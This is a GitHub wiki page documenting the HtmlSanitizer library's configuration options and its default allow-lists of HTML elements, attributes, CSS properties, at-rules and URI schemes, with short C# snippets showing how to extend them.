-
Notifications
You must be signed in to change notification settings - Fork 202
Options
HtmlSanitizer has a few flags that can be set to affect how the input string is parsed:
Name | Description | Default |
---|---|---|
KeepChildNodes |
If true , child nodes of elements that are removed will be kept. |
false |
AllowDataAttributes |
If true , all HTML5 data attributes (attributes prefixed with data- ) are allowed. |
false |
HtmlSanitizer works by allowing only a set of specific elements/attributes, rather than looking for specific exploits.
The following HTML elements are allowed by default:
a |
abbr |
acronym |
address |
area |
article |
aside |
b |
bdi |
big |
blockquote |
br |
button |
caption |
center |
cite |
code |
col |
colgroup |
data |
datalist |
dd |
del |
details |
dfn |
dir |
div |
dl |
dt |
em |
fieldset |
figcaption |
figure |
font |
footer |
form |
h1 |
h2 |
h3 |
h4 |
h5 |
h6 |
header |
hr |
i |
img |
input |
ins |
kbd |
keygen |
label |
legend |
li |
main |
map |
mark |
menu |
menuitem |
meter |
nav |
ol |
optgroup |
option |
output |
p |
pre |
progress |
q |
rp |
rt |
ruby |
s |
samp |
section |
select |
small |
span |
strike |
strong |
sub |
summary |
sup |
table |
tbody |
td |
textarea |
tfoot |
th |
thead |
time |
tr |
tt |
u |
ul |
var |
wbr |
The following attributes are allowed by default:
abbr |
accept |
accept-charset |
accesskey |
action |
align |
alt |
autocomplete |
autosave |
axis |
bgcolor |
border |
cellpadding |
cellspacing |
challenge |
char |
charoff |
charset |
checked |
cite |
clear |
color |
cols |
colspan |
compact |
contenteditable |
coords |
datetime |
dir |
disabled |
draggable |
dropzone |
enctype |
for |
frame |
headers |
height |
high |
href |
hreflang |
hspace |
ismap |
keytype |
label |
lang |
list |
longdesc |
low |
max |
maxlength |
media |
method |
min |
multiple |
name |
nohref |
noshade |
novalidate |
nowrap |
open |
optimum |
pattern |
placeholder |
prompt |
pubdate |
radiogroup |
readonly |
rel |
required |
rev |
reversed |
rows |
rowspan |
rules |
scope |
selected |
shape |
size |
span |
spellcheck |
src |
start |
Note: to prevent classjacking and interference with classes where the sanitized fragment is to be integrated, the class
attribute is not in the whitelist by default.
It can be added as follows:
var sanitizer = new HtmlSanitizer();
sanitizer.AllowedAttributes.Add("class");
var sanitized = sanitizer.Sanitize(html);
The following properties are allowed when using a style
attribute:
background |
background-attachment |
background-color |
background-image |
background-position |
background-repeat |
border |
border-bottom |
border-bottom-color |
border-bottom-style |
border-bottom-width |
border-collapse |
border-color |
border-left |
border-left-color |
border-left-style |
border-left-width |
border-right |
border-right-color |
border-right-style |
border-right-width |
border-spacing |
border-style |
border-top |
border-top-color |
border-top-style |
border-top-width |
border-width |
bottom |
caption-side |
clear |
clip |
color |
content |
counter-increment |
counter-reset |
cursor |
direction |
display |
empty-cells |
float |
font |
font-family |
font-size |
font-style |
font-variant |
font-weight |
height |
left |
letter-spacing |
line-height |
list-style |
list-style-image |
list-style-position |
list-style-type |
margin |
margin-bottom |
margin-left |
margin-right |
margin-top |
max-height |
max-width |
min-height |
min-width |
opacity |
orphans |
outline |
outline-color |
outline-style |
outline-width |
overflow |
padding |
padding-bottom |
padding-left |
padding-right |
padding-top |
page-break-after |
page-break-before |
page-break-inside |
quotes |
right |
table-layout |
text-align |
text-decoration |
text-indent |
text-transform |
top |
unicode-bidi |
vertical-align |
visibility |
white-space |
widows |
width |
word-spacing |
z-index |
namespace
, style
style
refers to style declarations within other at-rules such as @media
. Disallowing @namespace
while allowing other types of at-rules can lead to errors.
Property declarations in @font-face
and @viewport
are not sanitized.
Note: the style
tag is disallowed by default.
http
, https
Note: Protocol-relative URLs (e.g. //github.com) are allowed by default (as are other relative URLs).
to allow mailto:
links:
sanitizer.AllowedSchemes.Add("mailto");
action
, background
, dynsrc
, href
, lowsrc
, src